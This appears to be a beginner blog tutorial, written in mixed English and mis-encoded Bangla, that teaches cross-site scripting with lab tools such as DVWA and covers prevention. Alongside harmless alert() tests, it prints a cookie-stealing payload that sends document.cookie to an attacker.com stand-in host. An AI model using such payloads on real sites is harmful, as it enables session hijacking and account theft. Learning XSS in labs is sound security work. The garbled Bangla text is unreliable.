✅ Web Hacking Level 3: XSS (Cross Site Scripting) – Bangla Guide
๐ Level Title: XSS (Cross Site Scripting)
๐ Category: Web Hacking
๐ Language: Bangla + English
๐ฅ Practice Tools: DVWA, PortSwigger XSS Labs, OWASP Juice Shop
๐ Goal: XSS เฆฆিเงে Web Page เฆเฆฐ เฆญিเฆคเฆฐে Malicious Code Inject เฆเฆฐা เฆถিเฆা
๐ง What is XSS? (English + Bangla)
English:
XSS (Cross Site Scripting) is a web vulnerability that allows an attacker to inject malicious scripts (usually JavaScript) into webpages viewed by other users.
Bangla:
XSS เฆฌা Cross Site Scripting เฆนเฆฒো เฆเฆฎเฆจ เฆเฆเฆি เฆฆুเฆฐ্เฆฌเฆฒเฆคা, เฆฏাเฆฐ เฆฎাเฆง্เฆฏเฆฎে เฆเฆเฆเฆจ Attacker เฆোเฆจো Web Page-เฆ JavaScript เฆธ্เฆ্เฆฐিเฆช্เฆ เฆเฆจเฆেเฆ্เฆ เฆเฆฐเฆคে เฆชাเฆฐে। เฆเฆ Page เฆฏเฆเฆจ เฆ
เฆจ্เฆฏ เฆেเฆ เฆฆেเฆে, เฆคเฆเฆจ เฆ เฆธ্เฆ্เฆฐিเฆช্เฆ เฆคাเฆฐ Browser-เฆ Execute เฆนเง। เฆเฆคে Cookie เฆুเฆฐি, Fake Login เฆเฆค্เฆฏাเฆฆি เฆเฆฐা เฆฏাเง।
๐ฅ Types of XSS (เฆงเฆฐเฆจเฆธเฆฎূเฆน)
| XSS Type | Description | เฆฌাংเฆฒা เฆฌ্เฆฏাเฆ্เฆฏা |
|---|---|---|
| Stored XSS | Script saved on server (e.g., in comments) | เฆธ্เฆ্เฆฐিเฆช্เฆ เฆธাเฆฐ্เฆญাเฆฐে เฆเฆฎা เฆฅাเฆে |
| Reflected XSS | Script appears in URL and executes immediately | เฆเฆเฆเฆฐเฆเฆฒ-เฆ เฆเฆจเฆেเฆ্เฆ เฆนเง, เฆ্เฆฒিเฆ เฆเฆฐเฆฒে เฆเฆ্เฆธিเฆিเฆเฆ เฆนเง |
| DOM-Based XSS | Runs on client-side using JavaScript | เฆ্เฆฒাเงেเฆจ্เฆ เฆฌ্เฆฐাเฆเฆাเฆฐে JavaScript เฆฆিเงে เฆฐাเฆจ เฆนเง |
๐งช XSS Attack Example (Click-to-Copy)
๐ Example URL:
http://victim.com/search.php?q=<script>alert('XSS')</script>
Click-to-Copy:
<script>alert('XSS')</script>
⛔ เฆเฆ Script victim เฆเฆฐ Browser เฆ alert Pop-up เฆคৈเฆฐি เฆเฆฐเฆฌে।
๐งฐ Tools for Practicing XSS
- ๐ DVWA (Damn Vulnerable Web App)
- ⚔️ bWAPP (Buggy Web App)
- ๐ง OWASP Juice Shop
- ๐ PortSwigger XSS Labs
๐ฃ Real-Life Example
Comment Box เฆ เฆจিเฆেเฆฐ เฆোเฆก เฆฆিเฆฒে – Cookie เฆুเฆฐি เฆเฆฐা เฆฏাเง:
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
⚠️ XSS เฆเฆฐ เฆฌিเฆชเฆฆ เฆী?
- ✅ Victim เฆเฆฐ Cookies เฆুเฆฐি เฆนเฆคে เฆชাเฆฐে
- ✅ Fake Login Page เฆฆেเฆাเฆจো เฆฏাเง
- ✅ Victim เฆเฆฐ Account Hack เฆเฆฐা เฆฏাเง
- ✅ Web App-เฆเฆฐ เฆชুเฆฐা Control เฆจেเฆเงা เฆฏাเง
๐ก️ How to Prevent XSS?
| Method | Explanation |
|---|---|
| ✅ Input Validation | User Input Properly Check เฆเฆฐเฆคে เฆนเฆฌে |
| ✅ Output Encoding | Display เฆเฆฐাเฆฐ เฆเฆে Encode เฆเฆฐเฆคে เฆนเฆฌে |
| ✅ Content Security Policy (CSP) | Script Execution เฆจিเงเฆจ্เฆค্เฆฐเฆฃে เฆเฆจা เฆฏাเง |
| ✅ Escape Characters | <, >, ", ', & เฆเฆুเฆฒো Escape เฆเฆฐเฆคে เฆนเฆฌে |
๐ง Practice Task
- DVWA เฆคে Reflected XSS เฆฒেเฆญেเฆฒ Complete เฆเฆฐো
- <script>alert("Hello XSS")</script> เฆฆিเงে Input Test เฆเฆฐো
- Alert Pop-up เฆฆেเฆเฆฒে เฆฌুเฆเฆฌে Success เฆนเงেเฆে
- Stored XSS เฆเฆฌং Cookie Stealing เฆเฆฐে เฆช্เฆฐ্เฆฏাเฆเฆিเฆธ เฆฌাเงাเฆ
๐ Next Level: CSRF Attack (Level 4)
0 Comments
“Please share your thoughts or questions below. Only Google account users can comment.”